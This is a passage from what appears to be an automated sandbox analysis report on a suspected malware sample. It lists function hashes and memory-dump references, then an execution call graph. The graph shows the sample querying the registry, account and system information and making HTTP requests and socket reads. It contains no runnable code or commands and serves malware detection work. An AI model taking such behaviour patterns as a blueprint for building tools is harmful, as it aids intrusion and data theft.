                    • Opcode Fuzzy Hash: b2b88bf04142e27d3d77ebbeac009944445f9a7a78bf40efd94b62a0bcf5f504
                    • Instruction Fuzzy Hash: D611E7A738C211BDE1819C4917A8AF6665EF3EA734330A623F507CE502F2583AB96171
                    Function 04EA00EB Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 58a646060c84b219b932fdc97584555d44e47f749a7b759935f7eb4010354fd6
                    • Instruction ID: 4b0cfa64204e1535de85d81dc27f466e6480fa65440169f487309f950e569b07
                    • Opcode Fuzzy Hash: 58a646060c84b219b932fdc97584555d44e47f749a7b759935f7eb4010354fd6
                    • Instruction Fuzzy Hash: FB11E2B724D211EDE1828C456AA89F6275DE7EA234330A656F007CE502F2643A696131
                    Function 04EA00D6 Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 18c382b22458d4bb0cbcb178d3cab363c615b967f2bf069e1db3e911ac4c6e78
                    • Instruction ID: f92a41eb1194aac81a75fcd7c039039b9d248ec05570c3d67e7eb048fd506324
                    • Opcode Fuzzy Hash: 18c382b22458d4bb0cbcb178d3cab363c615b967f2bf069e1db3e911ac4c6e78
                    • Instruction Fuzzy Hash: 8A11E7A734C211BDE1819C5957A8AF76B5EF3EA330330A627F507CE502F2543AB96171
                    Function 04EA008F Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8851d397269953e1f17101c23d11611f261a49c1183d57f4798cc86263a6ef8
                    • Instruction ID: 0569c4c458e06a667be02880125de6c0930da99b18528f78b5f46c29775f602d
                    • Opcode Fuzzy Hash: b8851d397269953e1f17101c23d11611f261a49c1183d57f4798cc86263a6ef8
                    • Instruction Fuzzy Hash: 0711E7A734C211BDE1819C4557A8AF7665EF3EA330330A623F507CE502F2543AB97171
                    Function 04EA0123 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d62f06cc60b33f125b81ae1e1c9862c832aa86c10549c2ba9137694e1e39bc79
                    • Instruction ID: 62dd95d549099fbeadd421e7e16090c67d12066586e77e2e32dc9f865d5e9e09
                    • Opcode Fuzzy Hash: d62f06cc60b33f125b81ae1e1c9862c832aa86c10549c2ba9137694e1e39bc79
                    • Instruction Fuzzy Hash: 0E01C4EB34C211BDA181DC556B689FB675DF3EA730330A623F407CE502F2947A696171
                    Function 04EA0148 Relevance: .1, Instructions: 80COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c80a7c8c1f13571345f42fa53e34b16fcdcb05558c0360a70287f588340c63d3
                    • Instruction ID: aab18e75bab8b6e879354241612a608a9a3c5deb324190ec9f656f7cad482b58
                    • Opcode Fuzzy Hash: c80a7c8c1f13571345f42fa53e34b16fcdcb05558c0360a70287f588340c63d3
                    • Instruction Fuzzy Hash: 4F0126E734D211BDE1419C552B98AF727ADE3EA734330A262F047CF502F2A43A696171
                    Function 04EA0177 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6418c5dd81f4663c49278e6a5dedbad85d5347ddd89926c628d28e08826cb601
                    • Instruction ID: 4e73620562b98af980c110f59710c7a53937d652ae5ba6f8b8f8e8adb720db2f
                    • Opcode Fuzzy Hash: 6418c5dd81f4663c49278e6a5dedbad85d5347ddd89926c628d28e08826cb601
                    • Instruction Fuzzy Hash: 410145B724C310AEE281CD5563985FA37A9F7E73343309523F003CE502F2653A696231
                    Function 04EA016A Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 828340ffa215af1c444437b0f62d1cdce4bf37f4909f89674a16854673450414
                    • Instruction ID: 16508f4ea9626063e5604d4df03867ffd030ebec1304cffd82e61f897c68af61
                    • Opcode Fuzzy Hash: 828340ffa215af1c444437b0f62d1cdce4bf37f4909f89674a16854673450414
                    • Instruction Fuzzy Hash: 01F0D6BB24D311ADA181DC5527586FA3B5DE3EA334330A163F407CF502F1643A696171
                    Function 04EA018D Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af6f81fb6de6de82d4ff3e44f28a87e6ae4d0e3c09b1f96c52e267667e5fe833
                    • Instruction ID: 43c485f3a7f595f0042e7e9aba55b76243641cc82ed91f4d0c7a55d4ce38dd7e
                    • Opcode Fuzzy Hash: af6f81fb6de6de82d4ff3e44f28a87e6ae4d0e3c09b1f96c52e267667e5fe833
                    • Instruction Fuzzy Hash: 5EF044B734E311ACA281CD4427489FA675CF2E7334330A633F007CE902F1A839296131
                    Function 04EA01A8 Relevance: .1, Instructions: 57COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fec837a75e3b469e6ec3d057224954a8ef299c4bc3f31a6dee5d8e73a6ff9a60
                    • Instruction ID: b7e7beebc4448b40c0658d6f37fd2b86cd9bef258e10eb62f76f4cbc5e2f14e8
                    • Opcode Fuzzy Hash: fec837a75e3b469e6ec3d057224954a8ef299c4bc3f31a6dee5d8e73a6ff9a60
                    • Instruction Fuzzy Hash: 69F0FFB764C321ADA281DCA527185FB23ADF7E2338330A527F003CA402F1A97965A171
                    Function 04EA01C6 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ecd863c2bab503733535b29fac002a961edc6ae44c31f23e3acd8ec4ed6cc37d
                    • Instruction ID: 04ff3ba5251b418d20025c60e004b8b33213f8a859397f31851cd826dafbbb3f
                    • Opcode Fuzzy Hash: ecd863c2bab503733535b29fac002a961edc6ae44c31f23e3acd8ec4ed6cc37d
                    • Instruction Fuzzy Hash: 16F0A7EB28D215ADB281DC452B245FF635DF3E53383309527F847CA502B155396A6170
                    Function 04EA01EF Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 368e0d385766324ae7716efda84f8697adf7a56c051bfd3c4806d10f50046cff
                    • Instruction ID: db8d904d7f1f5ae7a3593ff63257ae2f4247a120ea431820872ee602f9f66580
                    • Opcode Fuzzy Hash: 368e0d385766324ae7716efda84f8697adf7a56c051bfd3c4806d10f50046cff
                    • Instruction Fuzzy Hash: 7AE092FB28D211ACB0819C853A146FA674DF2E63383309523F447CA403B0A939696170
                    Function 04EA01DF Relevance: .0, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1831502789.0000000004EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4ea0000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5598d54e190ae682d9018c4754ee4433cd00a6ffcefcaf3a9b094fb8759e8930
                    • Instruction ID: 7daa3b539f8ad7e01812a73a34a56a9624f6406a24e3e3531b78f9fe6f37655c
                    • Opcode Fuzzy Hash: 5598d54e190ae682d9018c4754ee4433cd00a6ffcefcaf3a9b094fb8759e8930
                    • Instruction Fuzzy Hash: 85E0E5AB28C210ACA0818C492B145FA635DF2E53383309623F043CA402F19539796670

                    Execution Graph

                    Execution Coverage:6.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:5.8%
                    Total number of Nodes:516
                    Total number of Limit Nodes:31
                    execution_graph 13841 766974 13842 766982 13841->13842 13843 76698c 13841->13843 13844 7668bd 2 API calls 13843->13844 13845 7669a6 __freea 13844->13845 13676 73e410 13677 73e435 13676->13677 13679 73e419 13676->13679 13679->13677 13680 73e270 13679->13680 13681 73e280 __dosmaperr 13680->13681 13682 768979 2 API calls 13681->13682 13684 73e2bd std::_Xinvalid_argument 13682->13684 13683 73e435 13683->13679 13684->13683 13685 73e270 2 API calls 13684->13685 13685->13684 13836 7386b0 13837 7386b6 13836->13837 13838 7386d6 13837->13838 13839 7666e7 2 API calls 13837->13839 13840 7386d0 13839->13840 14015 73dfd0 recv 14016 73e032 recv 14015->14016 14017 73e067 recv 14016->14017 14019 73e0a1 14017->14019 14018 73e1c3 14019->14018 14020 74c5dc GetSystemTimePreciseAsFileTime 14019->14020 14021 73e1fe 14020->14021 14022 74c19a 7 API calls 14021->14022 14023 73e268 14022->14023 13400 741dd0 13401 741e6b shared_ptr __dosmaperr 13400->13401 13407 741e78 shared_ptr std::_Xinvalid_argument 13401->13407 13410 768979 13401->13410 13404 742265 shared_ptr 13404->13407 13414 7666e7 13404->13414 13405 74268b shared_ptr __dosmaperr 13406 768979 2 API calls 13405->13406 13405->13407 13408 742759 13406->13408 13408->13407 13418 735df0 13408->13418 13411 768994 13410->13411 13425 7686d7 13411->13425 13413 76899e 13413->13404 13415 7666f3 13414->13415 13417 7666fd __cftof __dosmaperr 13415->13417 13511 766670 13415->13511 13417->13405 13420 735e28 13418->13420 13419 735f0e shared_ptr 13419->13407 13420->13419 13421 736060 RegOpenKeyExA 13420->13421 13422 73645a shared_ptr 13421->13422 13424 7360b3 __cftof 13421->13424 13422->13407 13423 736153 RegEnumValueW 13423->13424 13424->13422 13424->13423 13426 7686e9 13425->13426 13430 7686fe __cftof __dosmaperr 13426->13430 13431 76683a 13426->13431 13429 76872e 13429->13430 13437 768925 13429->13437 13430->13413 13432 76685a 13431->13432 13436 766851 13431->13436 13432->13436 13443 76b4bb 13432->13443 13436->13429 13438 768962 13437->13438 13439 768932 13437->13439 13504 76d2e9 13438->13504 13441 768941 __fassign 13439->13441 13499 76d30d 13439->13499 13441->13429 13444 76b4ce 13443->13444 13446 766890 13443->13446 13444->13446 13451 76f46b 13444->13451 13447 76b4e8 13446->13447 13448 76b4fb 13447->13448 13450 76b510 13447->13450 13448->13450 13482 76e571 13448->13482 13450->13436 13452 76f477 __cftof 13451->13452 13453 76f4c6 13452->13453 13456 768aaf 13452->13456 13453->13446 13455 76f4eb 13457 768ab4 __cftof 13456->13457 13461 768abf 13457->13461 13465 76d4f4 13457->13465 13460 768af2 __cftof __dosmaperr 13460->13455 13462 76651d 13461->13462 13470 7663f7 13462->13470 13466 76d500 __cftof 13465->13466 13467 76651d __cftof 2 API calls 13466->13467 13469 76d55c __cftof __dosmaperr 13466->13469 13468 76d6ee __cftof __dosmaperr 13467->13468 13468->13461 13469->13461 13471 766405 __cftof 13470->13471 13472 766450 13471->13472 13475 76645b 13471->13475 13472->13460 13480 76a1c2 GetPEB 13475->13480 13477 766465 13478 76646a GetPEB 13477->13478 13479 76647a __cftof 13477->13479 13478->13479 13481 76a1dc __cftof 13480->13481 13481->13477 13483 76e57b 13482->13483 13486 76e489 13483->13486 13485 76e581 13485->13450 13490 76e495 __cftof __freea 13486->13490 13487 76e4b6 13487->13485 13488 768aaf __cftof 2 API calls 13489 76e528 13488->13489 13491 76e564 13489->13491 13495 76a5ee 13489->13495 13490->13487 13490->13488 13491->13485 13496 76a611 13495->13496 13497 768aaf __cftof 2 API calls 13496->13497 13498 76a687 13497->13498 13500 76683a __cftof 2 API calls 13499->13500 13502 76d32a 13500->13502 13501 76d33a 13501->13441 13502->13501 13508 76f07f 13502->13508 13505 76d2f4 13504->13505 13506 76b4bb __cftof 2 API calls 13505->13506 13507 76d304 13506->13507 13507->13441 13509 76683a __cftof 2 API calls 13508->13509 13510 76f09f __cftof __fassign __freea 13509->13510 13510->13501 13512 766692 13511->13512 13514 76667d __cftof __dosmaperr __freea 13511->13514 13512->13514 13515 769ef9 13512->13515 13514->13417 13516 769f36 13515->13516 13517 769f11 13515->13517 13516->13514 13517->13516 13519 7702f8 13517->13519 13520 770304 13519->13520 13522 77030c __cftof __dosmaperr 13520->13522 13523 7703ea 13520->13523 13522->13516 13524 77040c 13523->13524 13526 770410 __cftof __dosmaperr 13523->13526 13524->13526 13527 76fb7f 13524->13527 13526->13522 13528 76fbcc 13527->13528 13529 76683a __cftof 2 API calls 13528->13529 13530 76fbdb __cftof 13529->13530 13531 76fe7b 13530->13531 13532 76d2e9 2 API calls 13530->13532 13533 76c4ea GetPEB GetPEB __fassign 13530->13533 13531->13526 13532->13530 13533->13530 13939 749310 13940 749325 13939->13940 13941 749363 13939->13941 13942 74d041 SleepConditionVariableCS 13940->13942 13943 74932f 13942->13943 13943->13941 13944 74cff7 RtlWakeAllConditionVariable 13943->13944 13944->13941 13600 74b85e 13605 74b6e5 13600->13605 13602 74b886 13613 74b648 13602->13613 13604 74b89f 13606 74b6f1 Concurrency::details::_Reschedule_chore 13605->13606 13607 74b722 13606->13607 13623 74c5dc 13606->13623 13607->13602 13611 74b70c __Mtx_unlock 13612 732ad0 7 API calls 13611->13612 13612->13607 13614 74b654 Concurrency::details::_Reschedule_chore 13613->13614 13615 74b6ae 13614->13615 13616 74c5dc GetSystemTimePreciseAsFileTime 13614->13616 13615->13604 13617 74b669 13616->13617 13618 732ad0 7 API calls 13617->13618 13619 74b66f __Mtx_unlock 13618->13619 13620 732ad0 7 API calls 13619->13620 13621 74b68c __Cnd_broadcast 13620->13621 13621->13615 13622 732ad0 7 API calls 13621->13622 13622->13615 13631 74c382 13623->13631 13625 74b706 13626 732ad0 13625->13626 13627 732ada 13626->13627 13628 732adc 13626->13628 13627->13611 13648 74c19a 13628->13648 13632 74c3d8 13631->13632 13634 74c3aa 13631->13634 13632->13634 13637 74ce9b 13632->13637 13634->13625 13635 74c42d __Xtime_diff_to_millis2 13635->13634 13636 74ce9b _xtime_get GetSystemTimePreciseAsFileTime 13635->13636 13636->13635 13638 74ceaa 13637->13638 13640 74ceb7 __aulldvrm 13637->13640 13638->13640 13641 74ce74 13638->13641 13640->13635 13644 74cb1a 13641->13644 13645 74cb37 13644->13645 13646 74cb2b GetSystemTimePreciseAsFileTime 13644->13646 13645->13640 13646->13645 13649 74c1c2 13648->13649 13650 74c1a4 13648->13650 13649->13649 13650->13649 13652 74c1c7 13650->13652 13655 732aa0 13652->13655 13654 74c1de std::_Throw_future_error 13654->13650 13669 74be0f 13655->13669 13657 732abf 13657->13654 13658 768aaf __cftof 2 API calls 13659 766c26 13658->13659 13660 766c35 13659->13660 13661 766c43 13659->13661 13662 766c99 6 API calls 13660->13662 13663 7668bd 2 API calls 13661->13663 13665 766c3f 13662->13665 13666 766c5d 13663->13666 13664 732ab4 13664->13657 13664->13658 13665->13654 13667 766c99 6 API calls 13666->13667 13668 766c71 __freea 13666->13668 13667->13668 13668->13654 13672 74cb61 13669->13672 13673 74cb6f InitOnceExecuteOnce 13672->13673 13675 74be22 13672->13675 13673->13675 13675->13664 13846 766559 13847 7663f7 __cftof 2 API calls 13846->13847 13848 76656a 13847->13848 13686 737400 13687 737435 shared_ptr 13686->13687 13690 73752f shared_ptr 13687->13690 13692 74d041 13687->13692 13689 7375bd 13689->13690 13696 74cff7 13689->13696 13694 74d052 13692->13694 13693 74d05a 13693->13689 13694->13693 13700 74d0c9 13694->13700 13697 74d006 13696->13697 13698 74d0af 13697->13698 13699 74d0ab RtlWakeAllConditionVariable 13697->13699 13698->13690 13699->13690 13701 74d0d7 SleepConditionVariableCS 13700->13701 13703 74d0f0 13700->13703 13701->13703 13703->13694 13704 746ae0 13705 746b10 13704->13705 13708 7446c0 13705->13708 13707 746b5c Sleep 13707->13705 13711 7446fb 13708->13711 13724 744d80 shared_ptr 13708->13724 13709 744e69 shared_ptr 13709->13707 13711->13724 13729 73bd60 13711->13729 13713 744f25 shared_ptr 13714 744fee shared_ptr 13713->13714 13718 746ab6 13713->13718 13757 737d00 13714->13757 13716 744ffd 13763 7382b0 13716->13763 13720 7446c0 14 API calls 13718->13720 13719 744a0d 13721 73bd60 5 API calls 13719->13721 13719->13724 13722 746b5c Sleep 13720->13722 13726 744a72 shared_ptr 13721->13726 13722->13718 13723 744753 shared_ptr __dosmaperr 13723->13719 13725 768979 2 API calls 13723->13725 13724->13709 13747 7365b0 13724->13747 13725->13719 13726->13724 13740 7442a0 13726->13740 13728 745016 shared_ptr 13728->13707 13730 73bdb2 13729->13730 13731 73c14e shared_ptr 13729->13731 13730->13731 13732 73bdc6 InternetOpenW InternetConnectA 13730->13732 13731->13723 13733 73be3d 13732->13733 13734 73be53 HttpOpenRequestA 13733->13734 13735 73be71 shared_ptr 13734->13735 13736 73bf13 HttpSendRequestA 13735->13736 13738 73bf2b shared_ptr 13736->13738 13737 73bfb3 InternetReadFile 13739 73bfda 13737->13739 13738->13737 13741 7442e2 13740->13741 13742 744556 13741->13742 13745 744308 shared_ptr 13741->13745 13744 743550 6 API calls 13742->13744 13743 744520 shared_ptr 13743->13724 13744->13743 13745->13743 13767 743550 13745->13767 13756 51601a8 13747->13756 13748 73660f LookupAccountNameA 13749 736662 13748->13749 13750 732280 2 API calls 13749->13750 13751 736699 shared_ptr 13750->13751 13752 732280 2 API calls 13751->13752 13753 736822 shared_ptr 13751->13753 13754 736727 shared_ptr 13752->13754 13753->13713 13754->13753 13755 732280 2 API calls 13754->13755 13755->13754 13756->13748 13759 737d66 shared_ptr __cftof 13757->13759 13758 737ea3 GetNativeSystemInfo 13760 737ea7 13758->13760 13759->13758 13759->13760 13762 737eb8 shared_ptr 13759->13762 13760->13762 13833 768a81 13760->13833 13762->13716 13766 738315 shared_ptr __cftof 13763->13766 13764 738333 13764->13728 13765 738454 GetNativeSystemInfo 13765->13764 13766->13764 13766->13765 13768 743ab2 shared_ptr std::_Xinvalid_argument 13767->13768 13769 74358f shared_ptr 13767->13769 13768->13745 13769->13768 13774 7438f5 shared_ptr __dosmaperr 13769->13774 13778 73aca0 13769->13778 13770 768979 2 API calls 13772 743a8a 13770->13772 13772->13768 13773 743e52 13772->13773 13776 743b9d 13772->13776 13793 742e20 13773->13793 13774->13768 13774->13770 13783 741dd0 13776->13783 13780 73adf0 __cftof 13778->13780 13779 73ae16 shared_ptr 13779->13774 13780->13779 13806 735500 13780->13806 13782 73af7e 13784 741e6b shared_ptr __dosmaperr 13783->13784 13785 768979 2 API calls 13784->13785 13790 741e78 shared_ptr std::_Xinvalid_argument 13784->13790 13787 742265 shared_ptr 13785->13787 13786 7666e7 2 API calls 13788 74268b shared_ptr __dosmaperr 13786->13788 13787->13786 13787->13790 13789 768979 2 API calls 13788->13789 13788->13790 13791 742759 13789->13791 13790->13768 13791->13790 13792 735df0 2 API calls 13791->13792 13792->13790 13794 742ec5 __cftof 13793->13794 13795 7432f2 InternetCloseHandle InternetCloseHandle 13794->13795 13796 743331 shared_ptr 13795->13796 13798 73aca0 2 API calls 13796->13798 13801 7438f5 shared_ptr __dosmaperr 13796->13801 13802 74351a shared_ptr std::_Xinvalid_argument 13796->13802 13797 768979 2 API calls 13799 743a8a 13797->13799 13798->13801 13800 743e52 13799->13800 13799->13802 13804 743b9d 13799->13804 13803 742e20 4 API calls 13800->13803 13801->13797 13801->13802 13802->13768 13803->13802 13805 741dd0 4 API calls 13804->13805 13805->13802 13807 735520 13806->13807 13809 735620 13807->13809 13810 732280 13807->13810 13809->13782 13813 732240 13810->13813 13814 732256 13813->13814 13817 768667 13814->13817 13820 767456 13817->13820 13819 732264 13819->13807 13821 767496 13820->13821 13825 76747e __cftof __dosmaperr 13820->13825 13822 76683a __cftof 2 API calls 13821->13822 13821->13825 13823 7674ae 13822->13823 13826 767a11 13823->13826 13825->13819 13828 767a22 13826->13828 13827 767a31 __cftof __dosmaperr 13827->13825 13828->13827 13829 767c35 GetPEB GetPEB 13828->13829 13830 767d83 GetPEB GetPEB 13828->13830 13831 767fb5 GetPEB GetPEB 13828->13831 13832 767c0f GetPEB GetPEB 13828->13832 13829->13828 13830->13828 13831->13828 13832->13828 13834 7686d7 2 API calls 13833->13834 13835 768a9f 13834->13835 13835->13762 13849 74a140 13850 74a1c0 13849->13850 13856 747040 13850->13856 13852 74a1fc shared_ptr 13854 74a3ee shared_ptr 13852->13854 13860 733ea0 13852->13860 13855 74a3d6 13857 747081 __cftof __Mtx_init_in_situ 13856->13857 13859 7472b6 13857->13859 13866 732e80 13857->13866 13859->13852 13861 733f08 13860->13861 13862 733ede 13860->13862 13863 733f18 13861->13863 13909 732bc0 13861->13909 13862->13855 13863->13855 13867 732ec6 13866->13867 13870 732f2f 13866->13870 13868 74c5dc GetSystemTimePreciseAsFileTime 13867->13868 13869 732ed2 13868->13869 13871 732fde 13869->13871 13873 732edd __Mtx_unlock 13869->13873 13876 74c5dc GetSystemTimePreciseAsFileTime 13870->13876 13885 732faf 13870->13885 13872 74c19a 7 API calls 13871->13872 13874 732fe4 13872->13874 13873->13870 13873->13874 13875 74c19a 7 API calls 13874->13875 13877 732f79 13875->13877 13876->13877 13878 74c19a 7 API calls 13877->13878 13879 732f80 __Mtx_unlock 13877->13879 13878->13879 13880 74c19a 7 API calls 13879->13880 13881 732f98 __Cnd_broadcast 13879->13881 13880->13881 13882 74c19a 7 API calls 13881->13882 13881->13885 13883 732ffc 13882->13883 13884 74c5dc GetSystemTimePreciseAsFileTime 13883->13884 13895 733040 shared_ptr __Mtx_unlock 13884->13895 13885->13859 13886 733185 13887 74c19a 7 API calls 13886->13887 13888 73318b 13887->13888 13889 74c19a 7 API calls 13888->13889 13890 733191 13889->13890 13891 74c19a 7 API calls 13890->13891 13897 733153 __Mtx_unlock 13891->13897 13892 733167 13892->13859 13893 74c19a 7 API calls 13894 73319d 13893->13894 13895->13886 13895->13888 13895->13892 13896 74c5dc GetSystemTimePreciseAsFileTime 13895->13896 13898 73311f 13896->13898 13897->13892 13897->13893 13898->13886 13898->13890 13898->13897 13900 74bc7c 13898->13900 13903 74baa2 13900->13903 13902 74bc8c 13902->13898 13904 74bacc 13903->13904 13905 74ce9b _xtime_get GetSystemTimePreciseAsFileTime 13904->13905 13908 74bad4 __Xtime_diff_to_millis2 13904->13908 13906 74baff __Xtime_diff_to_millis2 13905->13906 13907 74ce9b _xtime_get GetSystemTimePreciseAsFileTime 13906->13907 13906->13908 13907->13908 13908->13902 13910 732bce 13909->13910 13916 74b777 13910->13916 13912 732c02 13913 732c09 13912->13913 13922 732c40 13912->13922 13913->13855 13915 732c18 std::_Throw_future_error 13917 74b784 13916->13917 13921 74b7a3 Concurrency::details::_Reschedule_chore 13916->13921 13925 74caa7 13917->13925 13919 74b794 13919->13921 13927 74b74e 13919->13927 13921->13912 13933 74b72b 13922->13933 13924 732c72 shared_ptr 13924->13915 13926 74cac2 CreateThreadpoolWork 13925->13926 13926->13919 13928 74b757 Concurrency::details::_Reschedule_chore 13927->13928 13931 74ccfc 13928->13931 13930 74b771 13930->13921 13932 74cd11 TpPostWork 13931->13932 13932->13930 13934 74b737 13933->13934 13935 74b747 13933->13935 13934->13935 13937 74c9a8 13934->13937 13935->13924 13938 74c9bd TpReleaseWork 13937->13938 13938->13935 13945 748700 13946 74875a __cftof 13945->13946 13952 749ae0 13946->13952 13948 748784 13951 74879c 13948->13951 13956 7343b0 13948->13956 13950 748809 std::_Throw_future_error 13953 749b15 13952->13953 13962 732ca0 13953->13962 13955 749b46 13955->13948 13957 74be0f InitOnceExecuteOnce 13956->13957 13958 7343ca 13957->13958 13959 7343d1 13958->13959 13960 766beb 6 API calls 13958->13960 13959->13950 13961 7343e4 13960->13961 13963 732cdd 13962->13963 13964 74be0f InitOnceExecuteOnce 13963->13964 13965 732d06 13964->13965 13966 732d48 13965->13966 13967 732d11 13965->13967 13971 74be27 13965->13971 13978 732400 13966->13978 13967->13955 13972 74be33 std::_Throw_future_error 13971->13972 13973 74bea3 13972->13973 13974 74be9a 13972->13974 13976 732aa0 7 API calls 13973->13976 13981 74bdaf 13974->13981 13977 74be9f 13976->13977 13977->13966 13999 74b506 13978->13999 13980 732432 13982 74cb61 InitOnceExecuteOnce 13981->13982 13983 74bdc7 13982->13983 13984 74bdce 13983->13984 13987 766beb 13983->13987 13984->13977 13986 74bdd7 13986->13977 13992 766bf7 13987->13992 13988 768aaf __cftof 2 API calls 13989 766c26 13988->13989 13990 766c35 13989->13990 13991 766c43 13989->13991 13993 766c99 6 API calls 13990->13993 13994 7668bd 2 API calls 13991->13994 13992->13988 13995 766c3f 13993->13995 13996 766c5d 13994->13996 13995->13986 13997 766c99 6 API calls 13996->13997 13998 766c71 __freea 13996->13998 13997->13998 13998->13986 14000 74b521 std::_Throw_future_error 13999->14000 14001 768aaf __cftof 2 API calls 14000->14001 14003 74b588 __cftof 14000->14003 14002 74b5cf 14001->14002 14003->13980 13534 766beb 13539 766bf7 13534->13539 13535 768aaf __cftof 2 API calls 13536 766c26 13535->13536 13537 766c35 13536->13537 13538 766c43 13536->13538 13540 766c99 6 API calls 13537->13540 13546 7668bd 13538->13546 13539->13535 13542 766c3f 13540->13542 13543 766c5d 13545 766c71 __freea 13543->13545 13549 766c99 13543->13549 13547 76683a __cftof 2 API calls 13546->13547 13548 7668cf 13547->13548 13548->13543 13550 766cc4 __cftof 13549->13550 13556 766ca7 __cftof __dosmaperr 13549->13556 13551 766d06 CreateFileW 13550->13551 13557 766cea __cftof __dosmaperr 13550->13557 13552 766d2a 13551->13552 13553 766d38 13551->13553 13558 766e01 GetFileType 13552->13558 13570 766d77 13553->13570 13556->13545 13557->13545 13559 766e3c __cftof 13558->13559 13562 766ed2 __dosmaperr 13558->13562 13560 766e75 GetFileInformationByHandle 13559->13560 13559->13562 13561 766e8b 13560->13561 13560->13562 13575 7670c9 13561->13575 13562->13557 13566 766ea8 13567 766f71 SystemTimeToTzSpecificLocalTime 13566->13567 13568 766ebb 13567->13568 13569 766f71 SystemTimeToTzSpecificLocalTime 13568->13569 13569->13562 13571 766d85 13570->13571 13572 766d8a __dosmaperr 13571->13572 13573 7670c9 2 API calls 13571->13573 13572->13557 13574 766da3 13573->13574 13574->13557 13576 7670df _wcsrchr 13575->13576 13584 766e97 13576->13584 13589 76b9e4 13576->13589 13578 767123 13579 76b9e4 2 API calls 13578->13579 13578->13584 13580 767134 13579->13580 13581 76b9e4 2 API calls 13580->13581 13580->13584 13582 767145 13581->13582 13583 76b9e4 2 API calls 13582->13583 13582->13584 13583->13584 13585 766f71 13584->13585 13586 766f89 13585->13586 13587 766fa9 SystemTimeToTzSpecificLocalTime 13586->13587 13588 766f8f 13586->13588 13587->13588 13588->13566 13590 76b9f2 13589->13590 13593 76b9f8 __cftof __dosmaperr 13590->13593 13594 76ba2d 13590->13594 13592 76ba28 13592->13578 13593->13578 13595 76ba57 13594->13595 13598 76ba3d __cftof __dosmaperr 13594->13598 13596 76683a __cftof 2 API calls 13595->13596 13595->13598 13599 76ba81 13596->13599 13597 76b9a5 